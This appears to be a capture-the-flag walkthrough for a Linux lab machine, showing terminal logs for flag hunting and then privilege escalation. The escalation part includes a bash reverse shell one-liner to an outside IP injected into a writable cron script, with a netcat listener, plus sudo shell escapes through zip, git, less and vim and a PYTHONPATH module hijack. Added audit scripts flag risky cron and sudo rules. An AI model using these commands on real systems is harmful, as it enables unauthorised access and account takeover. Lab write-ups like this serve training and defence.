mission23@linuxagency:~$ su mission24
Password:
mission24@linuxagency:/home/mission23$ cd ..
mission24@linuxagency:/home$ cd mission24
mission24@linuxagency:~$ ls -la
total 40
drwxr-x--- 3 mission24 mission24 4096 Feb 1 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission24 mission24 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission24 mission24 3771 Jan 12 2021 .bashrc
-rwxr-xr-x 1 mission24 mission24 8576 Jan 12 2021 bribe
drwxr-xr-x 3 mission24 mission24 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission24 mission24 807 Jan 12 2021 .profile
-rw------- 1 mission24 mission24 4934 Jan 12 2021 .viminfo
mission24@linuxagency:~$ ./bribe
There is a guy who is smuggling flags
Bribe this guy to get the flag
Put some money in his pocket to get the flag
Words are not the price for your flag
Give Me money Man!!!
mission24@linuxagency:~$ export pocket=money
mission24@linuxagency:~$ ./bribe
Here ya go!!!
mission25{61b93637881c87c71f220033b22a921b}
Don't tell police about the deal man ;)
mission24@linuxagency:~$


mission25{61b93637881c87c71f220033b22a921b}

Question 26 – What is the mission26 flag?
- Next, as mission25, we are unable to execute most of the common commands. I set the PATH environment variable to /bin, which lets us execute the commands and get the flag.
mission24@linuxagency:~$ su mission25
Password:
mission25@linuxagency:/home/mission24$ cd ..
mission25@linuxagency:/home$ cd mission25
mission25@linuxagency:~$ ls -la
bash: ls: No such file or directory
---snipped ----
mission25@linuxagency:~$ export PATH=/bin
mission25@linuxagency:~$ cat flag.txt
mission26{cb6ce977c16c57f509e9f8462a120f00}
mission25@linuxagency:~$


mission26{cb6ce977c16c57f509e9f8462a120f00}

Question 27 – What is the mission27 flag?
- For this task, we have received a jpg image file. Analyzing its headers with the strings command reveals the flag.
mission25@linuxagency:~$ su mission26
Password:
mission26@linuxagency:/home/mission25$ cd .,
bash: cd: .,: Permission denied
mission26@linuxagency:/home/mission25$ cd ..
mission26@linuxagency:/home$ cd mission26
mission26@linuxagency:~$ ls -la
total 100
drwxr-x--- 2 mission26 mission26 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission26 mission26 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission26 mission26 3771 Jan 12 2021 .bashrc
-r-------- 1 mission26 mission26 85980 Jan 12 2021 flag.jpg
-rw-r--r-- 1 mission26 mission26 807 Jan 12 2021 .profile
mission26@linuxagency:~$ strings flag.jpg
JFIF
-mission27{444d29b932124a48e7dddc0595788f4d}
, #&')*)
-0-(0%()(
((((((((((((((((((((((((((((((((((((((((((((((((((
RYBP
^C^rP
!aVP
`X*P
--- snipped ---
mission27{444d29b932124a48e7dddc0595788f4d}

Question 28 – What is the mission28 flag?
- For this task, we have a long file name with multiple extensions. In reality, these extensions are only there to distract us. We only have to handle the last extension, which is .gz. I used gunzip to do that. Once decompressed, we are presented with a png file. I used the strings command again to reveal the flag.
mission26@linuxagency:~$ su mission27
Password:
mission27@linuxagency:/home/mission26$ cd ..
mission27@linuxagency:/home$ cd mission27
mission27@linuxagency:~$ ls -la
total 20
drwxr-x--- 2 mission27 mission27 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission27 mission27 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission27 mission27 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission27 mission27 136 Jan 12 2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
-rw-r--r-- 1 mission27 mission27 807 Jan 12 2021 .profile
mission27@linuxagency:~$ gunzip flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz
mission27@linuxagency:~$ ls -l
total 4
-rw-r--r-- 1 mission27 mission27 51 Jan 12 2021 flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
mission27@linuxagency:~$ strings flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png
GIF87a
mission28{03556f8ca983ef4dc26d2055aef9770f}
mission27@linuxagency:~$ 
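
The strings output above starts with GIF87a even though the decompressed file is named .png, so the extension says little about the content. The Python below is an added example, not part of the original walkthrough; the function names, the size cap and the sample bytes are assumptions constructed for illustration. It peels gzip layers with an output cap, compares the claimed extension with the magic bytes, and extracts printable strings the way strings does.

```python
import gzip
import re
import zlib

FLAG_RE = re.compile(rb"mission\d+\{[0-9a-f]{32}\}")
STRINGS_RE = re.compile(rb"[\x20-\x7e]{4,}")  # like strings(1): runs of >= 4 printable bytes

# Leading "magic" bytes -> canonical type name
MAGIC = [
    (b"\x1f\x8b", "gzip"),
    (b"\xff\xd8\xff", "jpeg"),
    (b"\x89PNG\r\n\x1a\n", "png"),
    (b"GIF87a", "gif"),
    (b"GIF89a", "gif"),
    (b"PK\x03\x04", "zip"),
]
EXT_ALIASES = {"jpg": "jpeg", "gz": "gzip"}
MAX_OUTPUT = 10 * 1024 * 1024  # refuse to inflate any layer beyond 10 MiB


def sniff(data):
    """Identify content by its first bytes, ignoring the file name."""
    for magic, kind in MAGIC:
        if data.startswith(magic):
            return kind
    return "unknown"


def gunzip_capped(data, limit=MAX_OUTPUT):
    """Decompress one gzip layer, failing instead of inflating past the limit."""
    d = zlib.decompressobj(wbits=zlib.MAX_WBITS | 16)  # 16 => expect a gzip header
    out = d.decompress(data, limit)
    if d.unconsumed_tail or not d.eof:
        raise ValueError("gzip layer is truncated or larger than the limit")
    return out


def triage(name, data, max_layers=8):
    """Peel gzip layers, then compare the claimed extension with the magic bytes."""
    layers = []
    while sniff(data) == "gzip" and len(layers) < max_layers:
        try:
            data = gunzip_capped(data)
        except (zlib.error, ValueError):
            break  # corrupt or oversized layer: report what we have so far
        layers.append("gzip")
        if name.lower().endswith(".gz"):  # gunzip drops one ".gz" per layer
            name = name[:-3]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    claimed = EXT_ALIASES.get(ext, ext)
    detected = sniff(data)
    return {
        "layers": layers,
        "claimed": claimed,
        "detected": detected,
        "mismatch": claimed != detected,
        "strings": [s.decode("ascii") for s in STRINGS_RE.findall(data)],
        "flags": [f.decode("ascii") for f in FLAG_RE.findall(data)],
    }


# Constructed samples (not the room's files): a GIF header plus text, gzipped
# and given the page's misleading file name, and a JFIF header followed by text.
DEMO_FLAG = b"mission99{" + b"0123456789abcdef" * 2 + b"}"
LONG_NAME = "flag.mp3.mp4.exe.elf.tar.php.ipynb.py.rb.html.css.zip.gz.jpg.png.gz"
GZ_SAMPLE = gzip.compress(b"GIF87a\n" + DEMO_FLAG + b"\n")
JPG_SAMPLE = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00\x01" + b"-" + DEMO_FLAG + b"\xff\xd9"

if __name__ == "__main__":
    for label, blob in ((LONG_NAME, GZ_SAMPLE), ("flag.jpg", JPG_SAMPLE)):
        report = triage(label, blob)
        print(label, report["layers"], report["claimed"], report["detected"],
              "MISMATCH" if report["mismatch"] else "ok", report["flags"])
```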
mission28{03556f8ca983ef4dc26d2055aef9770f}

Question 29 – What is the mission29 flag?
- In this one, we are welcomed by a Ruby interpreter (irb) as soon as we log in. We break out of the interactive session using the exec command to spawn a bash shell. We then find txt.galf, which holds the flag in reversed form. Reverse it using CyberChef to get the flag.
mission27@linuxagency:~$ su mission28
Password:
irb(main):002:0> exec "/bin/bash"
mission28@linuxagency:/home/mission27$ cd ..
mission28@linuxagency:/home$ cd mission28
mission28@linuxagency:~$ ls
examples.desktop txt.galf
mission28@linuxagency:~$ ls -la
total 40
drwxr-x--- 3 mission28 mission28 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission28 mission28 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission28 mission28 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 mission28 mission28 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 mission28 mission28 8980 Jan 12 2021 examples.desktop
drwxr-xr-x 3 mission28 mission28 4096 Jan 12 2021 .local
-rw-r--r-- 1 mission28 mission28 807 Jan 12 2021 .profile
-r-------- 1 mission28 mission28 44 Jan 12 2021 txt.galf
mission28@linuxagency:~$ cat txt.galf
}1fff2ad47eb52e68523621b8d50b2918{92noissim
mission28@linuxagency:~$ 

mission29{8192b05d8b12632586e25be74da2fff1}

Question 30 – What is the mission30 flag?
- Moving on to this task, we found a folder named bludit. We went inside it and read the .htpasswd file, which gives us our password.
mission28@linuxagency:~$ su mission29
Password:
mission29@linuxagency:/home/mission28$ cd ..
mission29@linuxagency:/home$ cd mission29
mission29@linuxagency:~$ ls -la
total 20
drwxr-x--- 3 mission29 mission29 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission29 mission29 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission29 mission29 3771 Jan 12 2021 .bashrc
drwxr-xr-x 7 mission29 mission29 4096 Jan 12 2021 bludit
-rw-r--r-- 1 mission29 mission29 807 Jan 12 2021 .profile
mission29@linuxagency:~$ cd bludit/
mission29@linuxagency:~/bludit$ ls -la
total 44
drwxr-xr-x 7 mission29 mission29 4096 Jan 12 2021 .
drwxr-x--- 3 mission29 mission29 4096 Jan 12 2021 ..
drwxr-xr-x 2 mission29 mission29 4096 Jan 12 2021 bl-content
drwxr-xr-x 10 mission29 mission29 4096 Jan 12 2021 bl-kernel
drwxr-xr-x 2 mission29 mission29 4096 Jan 12 2021 bl-languages
drwxr-xr-x 27 mission29 mission29 4096 Jan 12 2021 bl-plugins
drwxr-xr-x 4 mission29 mission29 4096 Jan 12 2021 bl-themes
-rw-r--r-- 1 mission29 mission29 394 Jan 12 2021 .htaccess
-rw-r--r-- 1 mission29 mission29 44 Jan 12 2021 .htpasswd
-rw-r--r-- 1 mission29 mission29 900 Jan 12 2021 index.php
-rw-r--r-- 1 mission29 mission29 1083 Jan 12 2021 LICENSE
mission29@linuxagency:~/bludit$ cat .htaccess
AddDefaultCharset UTF-8
<IfModule mod_rewrite.c>
# Enable rewrite rules
RewriteEngine on
# Base directory
#RewriteBase /
# Deny direct access to the next directories
RewriteRule ^bl-content/(databases|workspaces|pages|tmp)/.*$ - [R=404,L]
# All URL process by index.php
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*) index.php [PT,L]
</IfModule>
mission29@linuxagency:~/bludit$ cat .htpasswd
mission30{d25b4c9fac38411d2fcb4796171bda6e}
mission29@linuxagency:~/bludit$ 

mission30{d25b4c9fac38411d2fcb4796171bda6e}

Question 31 – What is viktor’s Flag?
- For this one, we moved into the Escalator folder and found a folder named .git. We used it to reveal the commit log.
mission29@linuxagency:/home$ su mission30
Password:
mission30@linuxagency:/home$ cd mission30
mission30@linuxagency:~$ ls -la
total 36
drwxr-x--- 3 mission30 mission30 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
lrwxrwxrwx 1 mission30 mission30 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mission30 mission30 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 mission30 mission30 3771 Jan 12 2021 .bashrc
drwxr-xr-x 3 mission30 mission30 4096 Jan 12 2021 Escalator
-rw-r--r-- 1 mission30 mission30 8980 Jan 12 2021 examples.desktop
-rw-r--r-- 1 mission30 mission30 807 Jan 12 2021 .profile
mission30@linuxagency:~$ cd Escalator/
mission30@linuxagency:~/Escalator$ ls -l
total 4
-rw-r--r-- 1 mission30 mission30 35 Jan 12 2021 sources.py
mission30@linuxagency:~/Escalator$ cat sources.py
mission30@linuxagency:~/Escalator/.git$ git log
commit 24cbf44a9cb0e65883b3f76ef5533a2b2ef96497 (HEAD -> master, origin/master)
Author: root <root@Xyan1d3>
Date: Mon Jan 11 15:37:56 2021 +0530
My 1st python Script
commit e0b807dbeb5aba190d6307f072abb60b34425d44
Author: root <root@Xyan1d3>
Date: Mon Jan 11 15:36:40 2021 +0530
Your flag is viktor{b52c60124c0f8f85fe647021122b3d9a}

viktor{b52c60124c0f8f85fe647021122b3d9a}



Task 4 – Privilege Escalation
Question 1 – su into viktor user using viktor’s flag as password
Done

Question 2 – What is dalia’s flag?
- Checking the cron job entries in the crontab, I found one for dalia where a script runs with her privileges. We can exploit it because the script is writable by our current user, viktor. We have to inject our reverse shell into the file to get a shell on our attacking machine. This is a hit-or-miss approach, as the script changes on its own: a second entry, run as root, rewrites it every minute. So I spammed the reverse shell one-liner into the script rapidly around the right time to get the reverse shell and the flag.
viktor@linuxagency:/home$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * dalia sleep 30;/opt/scripts/47.sh
* * * * * root echo "IyEvYmluL2Jhc2gKI2VjaG8gIkhlbGxvIDQ3IgpybSAtcmYgL2Rldi9zaG0vCiNlY2hvICJIZXJlIHRpbWUgaXMgYSBncmVhdCBtYXR0ZXIgb2YgZXNzZW5jZSIKcm0gLXJmIC90bXAvCg==" | base64 -d > /opt/scripts/47.sh;chown viktor:viktor /opt/scripts/47.sh;chmod +x /opt/scripts/47.sh;
viktor@linuxagency:/opt/scripts$ cat 47.sh
#!/bin/bash
#echo "Hello 47"
rm -rf /dev/shm/
#echo "Here time is a great matter of essence"
rm -rf /tmp/
bash -i >& /dev/tcp/10.18.11.103/1234 0>&1
viktor@linuxagency:/opt/scripts$ echo "bash -i >& /dev/tcp/10.18.11.103/1234 0>&1">> 47.sh
wh1terose@fsociety:~$ nc -lvnp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.62.203 53916
bash: cannot set terminal process group (5082): Inappropriate ioctl for device
bash: no job control in this shell
dalia@linuxagency:~$ ls
ls
examples.desktop
flag.txt
dalia@linuxagency:~$ cat flag.txt
cat flag.txt
dalia{4a94a7a7bb4a819a63a33979926c77dc}
dalia@linuxagency:~$ 
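
The condition behind this step, a cron job that runs as one account while its script is owned or writable by another, can be audited for directly. The following is an added example, not code from the room or from the original post; it assumes GNU stat and the /etc/crontab field layout, and its demo files are constructed in a temporary directory.

```bash
#!/usr/bin/env bash
# Added example: audit a system crontab for jobs whose script can be edited
# by an account other than the one cron runs it as.

# is_risky CRON_USER FILE_OWNER OCTAL_MODE -> prints a reason, returns 0 if risky
is_risky() {
    local cron_user="$1" owner="$2" mode="$3"
    # Write bit (2) set for group or other: non-owners can edit the file.
    if [ $(( (0$mode >> 3) & 2 )) -ne 0 ] || [ $(( 0$mode & 2 )) -ne 0 ]; then
        echo "group-or-world-writable"
        return 0
    fi
    # The owner can always rewrite the file, so only the cron user or root
    # should own it. On this page 47.sh is owned by viktor but run as dalia.
    if [ "$owner" != "$cron_user" ] && [ "$owner" != "root" ]; then
        echo "owned-by-$owner"
        return 0
    fi
    return 1
}

# audit_crontab FILE: FILE uses the /etc/crontab layout
# (five time fields, user, command).
audit_crontab() {
    local file="$1" m h dom mon dow user cmd tok owner mode why
    while read -r m h dom mon dow user cmd; do
        case $m in ''|'#'*|*=*) continue ;; esac   # blank, comment, VAR=value
        # Split the command on shell separators and inspect absolute paths.
        printf '%s\n' "$cmd" | tr -s ';|&()<> \t' '\n' | while read -r tok; do
            case $tok in /*) [ -f "$tok" ] || continue ;; *) continue ;; esac
            owner=$(stat -c %U "$tok")
            mode=$(stat -c %a "$tok")
            if why=$(is_risky "$user" "$owner" "$mode"); then
                printf 'RISK user=%s script=%s reason=%s\n' "$user" "$tok" "$why"
            fi
        done
    done < "$file"
}

# demo: constructed sandbox, not the room's real files. Ownership cannot be
# changed without root, so the risky script is made world-writable instead.
demo() {
    local dir me
    dir=$(mktemp -d)
    printf '#!/bin/sh\n' > "$dir/47.sh";     chmod 0757 "$dir/47.sh"
    printf '#!/bin/sh\n' > "$dir/backup.sh"; chmod 0755 "$dir/backup.sh"
    me=$(stat -c %U "$dir/backup.sh")
    cat > "$dir/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
* * * * * dalia sleep 30;$dir/47.sh
0 3 * * * $me $dir/backup.sh
EOF
    audit_crontab "$dir/crontab"
    rm -rf "$dir"
}

demo
```

On a real host, run `audit_crontab /etc/crontab` as root so every script is readable; a script owned by a user other than the one in the user field, as with 47.sh here, is reported as `owned-by-<user>`.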



dalia{4a94a7a7bb4a819a63a33979926c77dc}

Question 3 – What is silvio’s flag?
- For this one, we checked for sudo misconfigurations on the server. As per the output, dalia can run the zip binary as the user silvio without a password. We used the zip exploit from GTFOBins and captured the flag.
dalia@linuxagency:/home$ sudo -l
Matching Defaults entries for dalia on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User dalia may run the following commands on linuxagency:
(silvio) NOPASSWD: /usr/bin/zip
dalia@linuxagency:/home$ TF=$(mktemp -u)
dalia@linuxagency:/home$ sudo -u silvio zip $TF /etc/hosts -T -TT 'sh #'
$ id
uid=1032(silvio) gid=1032(silvio) groups=1032(silvio)
$ python -c 'import pty;pty.spawn("/bin/bash")'
silvio@linuxagency:/home$ cd silvio/
silvio@linuxagency:~$ ls
examples.desktop flag.txt
silvio@linuxagency:~$ cat flag.txt
silvio{657b4d058c03ab9988875bc937f9c2ef}
silvio@linuxagency:~
silvio{657b4d058c03ab9988875bc937f9c2ef}

Question 4 – What is reza’s flag?
- Next up we have reza. We checked for sudo misconfigurations again and found one for the git binary. To exploit it, we used GTFOBins again. Running the exploit as reza got us the user’s shell and flag.
silvio@linuxagency:~$ sudo -l
Matching Defaults entries for silvio on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User silvio may run the following commands on linuxagency:
(reza) SETENV: NOPASSWD: /usr/bin/git
silvio@linuxagency:~$ sudo -u reza PAGER='sh -c "exec sh 0<&1"' git -p help
$ id
uid=1033(reza) gid=1033(reza) groups=1033(reza)
$ python -c 'import pty;pty.spawn("/bin/bash")'
reza@linuxagency:/home/silvio$ cd ..
reza@linuxagency:/home$ cd reza/
reza@linuxagency:~$ ls
examples.desktop flag.txt
reza@linuxagency:~$ cat fla
cat: fla: No such file or directory
reza@linuxagency:~$ cat flag.txt
reza{2f1901644eda75306f3142d837b80d3e}
reza@linuxagency:~$ 


reza{2f1901644eda75306f3142d837b80d3e}

Question 5 – What is jordan’s flag?
- Well, this was a pain in the ass for a moment. We have to exploit the Python module import here by leveraging a path hijacking vulnerability. The Gun-Shop.py file requires a shop.py module to run. We can put our shell payload in our own shop.py and execute it with the help of the main file to get the shell. The flag has to be reversed; I used CyberChef for that.
reza@linuxagency:/home$ sudo -l
Matching Defaults entries for reza on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User reza may run the following commands on linuxagency:
(jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py
reza@linuxagency:/tmp$ touch shop.py
reza@linuxagency:/tmp$ echo "import os" > shop.py
reza@linuxagency:/tmp$ echo "os.system('/bin/bash')" >> shop.py
reza@linuxagency:/tmp$ cat shop.py
import os
os.system('/bin/bash')
reza@linuxagency:/tmp$ sudo -u jordan PYTHONPATH=/tmp/ /opt/scripts/Gun-Shop.py
jordan@linuxagency:/tmp$ cat /home/jordan/flag.txt
}3c3e9f8796493b98285b9c13c3b4cbcf{nadroj
jordan@linuxagency:/tmp$ 


jordan{fcbc4b3c31c9b58289b3946978f9e3c3}

Question 6 – What is ken’s flag?
- We checked again for any sudo misconfigurations and found that jordan can run the less binary as user ken without a password. So we read the flag using the less binary with the privileges of user “ken”. For shell access, we used GTFOBins again and got a shell as ken using less.
jordan@linuxagency:/tmp$ sudo -l
Matching Defaults entries for jordan on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jordan may run the following commands on linuxagency:
(ken) NOPASSWD: /usr/bin/less
jordan@linuxagency:/tmp$ sudo -u ken /usr/bin/less /home/ken/flag.txt
WARNING: terminal is not fully functional
ken{4115bf456d1aaf012ed4550c418ba99f}
/home/ken/flag.txt (END)
jordan@linuxagency:/tmp$ sudo -u ken less /etc/profile
WARNING: terminal is not fully functional
# /etc/profile: system-wide .profile file for the Bourne shell (sh(1))
# and Bourne compatible shells (bash(1), ksh(1), ash(1), ...).
if [ "${PS1-}" ]; then
if [ "${BASH-}" ] && [ "$BASH" != "/bin/sh" ]; then
# The file bash.bashrc already sets the default PS1.
# PS1='\h:\w\$ '
if [ -f /etc/bash.bashrc ]; then
. /etc/bash.bashrc
fi
else
if [ "`id -u`" -eq 0 ]; then
PS1='# '
else
PS1='$ '
fi
fi
fi
if [ -d /etc/profile.d ]; then
for i in /etc/profile.d/*.sh; do
if [ -r $i ]; then
. $i
!/bin/shfile
$ id
uid=1036(ken) gid=1036(ken) groups=1036(ken)
$ python -c 'import pty;pty.spawn("/bin/bash")'
ken@linuxagency:/tmp$ 

ken{4115bf456d1aaf012ed4550c418ba99f}

Question 7 – What is sean’s flag?
- To get the flag for sean, we exploited the vim binary to get the shell; however, the flag was not under the user’s home directory. After a little research, we found that the user belongs to the adm group, so the flag might reside in /var/log. Using grep to filter out anything useful, we got our flag. Along with that, we found another string encoded in base64 which, once decoded, reveals the password of penelope.
ken@linuxagency:/tmp$ sudo -l
Matching Defaults entries for ken on linuxagency:
env_reset, env_file=/etc/sudoenv, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ken may run the following commands on linuxagency:
(sean) NOPASSWD: /usr/bin/vim
ken@linuxagency:/tmp$ sudo -u sean vim -c ':!/bin/sh'
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_beos-ansi
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
:!/bin/sh
$ id
uid=1037(sean) gid=1037(sean) groups=1037(sean),4(adm)
$ python -c 'import pty;pty.spawn("/bin/bash")'
sean@linuxagency:/tmp$ cd /home/sean/
sean@linuxagency:~$ ls
examples.desktop
sean@linuxagency:/var/log$ grep -rn "sean{" /var/log 2>/dev/null
sean@linuxagency:/var/log$ grep -R sean ./* 2>/dev/null
./auth.log:Jun 20 11:22:15 localhost sudo: ken : TTY=pts/0 ; PWD=/tmp ; USER=sean ; COMMAND=/usr/bin/vim -c :!/bin/sh
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1036.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/system.journal matches
Binary file ./journal/e5c33f65843d4fde84404ee7ae1a0806/user-1037.journal matches
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./kern.log:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319395] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319448] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog:Jun 20 11:31:00 localhost kernel: [13845.319874] ptrace attach of "vim -c :!/bin/sh"[6678] was attempted by "grep --color=auto -r sean /bin /boot /cdrom /dev /etc /flag.txt /home /initrd.img /initrd.img.old /lib /lib64 /lost+found /media /mnt /opt /proc /root /run /sbin /snap /srv /swapfile /sys /tmp /usr /var /vmlinuz"[11268]
./syslog.bak:Jan 12 02:58:58 ubuntu kernel: [ 0.000000] ACPI: LAPIC_NMI (acpi_id[0x6d] high edge lint[0x1]) : sean{4c5685f4db7966a43cf8e95859801281} VGhlIHBhc3N3b3JkIG9mIHBlbmVsb3BlIGlzIHAzbmVsb3BlCg==
sean@linuxagency:/var/log$ 
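
The sudo rules met in Questions 3 to 7 (zip, git, Gun-Shop.py, less, vim) share two patterns: NOPASSWD on a binary that can spawn a shell, and SETENV, which lets the caller supply variables such as PAGER or PYTHONPATH. The following added example, not code from the room or the original post, flags both in `sudo -l` output; the sample listing is constructed from the rules shown on this page plus one benign rule, and the binary list covers only the tools used here.

```bash
#!/usr/bin/env bash
# Added example: flag risky rules in `sudo -l` output read from stdin.
audit_sudo_l() {
    awk '
    BEGIN {
        # Binaries this walkthrough used to reach a shell; extend from GTFOBins.
        n = split("zip git less vim", b, " ")
        for (i = 1; i <= n; i++) escape[b[i]] = 1
    }
    /^[ \t]*\(/ {                        # rule lines start with "(runas)"
        line = $0
        sub(/^[ \t]*\(/, "", line)
        runas = line; sub(/\).*$/, "", runas)
        rest = line;  sub(/^[^)]*\)[ \t]*/, "", rest)
        tags = ""
        # Peel off leading tags such as "SETENV: NOPASSWD: ".
        while (match(rest, /^[A-Z_]+:[ \t]*/)) {
            tags = tags " " substr(rest, 1, RLENGTH)
            rest = substr(rest, RLENGTH + 1)
        }
        split(rest, words, /[ \t]+/); cmd = words[1]
        k = split(cmd, parts, "/");   base = parts[k]
        # No password plus a shell-capable binary: a shell as the runas user.
        if (tags ~ / NOPASSWD:/ && (base in escape))
            printf "SHELL-ESCAPE runas=%s cmd=%s\n", runas, cmd
        # SETENV: the caller chooses the environment (PAGER, PYTHONPATH, ...).
        if (tags ~ / SETENV:/)
            printf "SETENV runas=%s cmd=%s\n", runas, cmd
    }'
}

# Constructed sample: the five rules shown on this page gathered into one
# listing for a hypothetical user "demo", plus one benign rule.
sample_sudo_l() {
    cat <<'EOF'
User demo may run the following commands on linuxagency:
    (silvio) NOPASSWD: /usr/bin/zip
    (reza) SETENV: NOPASSWD: /usr/bin/git
    (jordan) SETENV: NOPASSWD: /opt/scripts/Gun-Shop.py
    (ken) NOPASSWD: /usr/bin/less
    (sean) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/id
EOF
}

sample_sudo_l | audit_sudo_l
```

On a live host, pipe `sudo -l -U <user>` (run as root) into `audit_sudo_l` for each account. The fixes belong in sudoers: drop SETENV where the command does not need caller-supplied environment, and do not grant editors, pagers or archivers to other accounts.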



sean{4c5685f4db7966a43cf8e95859801281}

Question 8 – What is penelope’s flag?
- With the help of the password we found in the last task, log into the SSH server, switch user to penelope with the password p3nelope, and find the flag in the user’s home directory.
agent47@linuxagency:~$ su penelope
Password:
penelope@linuxagency:/home/agent47$ cd ..
penelope@linuxagency:/home$ cd penelope/
penelope@linuxagency:~$ ls -la
total 80
drwxr-x--- 3 penelope penelope 4096 Jan 12 2021 .
drwxr-xr-x 45 root root 4096 Jan 12 2021 ..
-rwsr-sr-x 1 maya maya 39096 Jan 12 2021 base64
lrwxrwxrwx 1 penelope penelope 9 Jan 12 2021 .bash_history -> /dev/null
-rw-r--r-- 1 penelope penelope 220 Jan 12 2021 .bash_logout
-rw-r--r-- 1 penelope penelope 3771 Jan 12 2021 .bashrc
-rw-r--r-- 1 penelope penelope 8980 Jan 12 2021 examples.desktop
-r-------- 1 penelope penelope 43 Jan 12 2021 flag.txt
drwx------ 3 penelope penelope 4096 Jan 12 2021 .gnupg
-rw-r--r-- 1 penelope penelope 807 Jan 12 2021 .profile
penelope@linuxagency:~$ cat flag.txt
penelope{2da1c2e9d2bd0004556ae9e107c1d222}
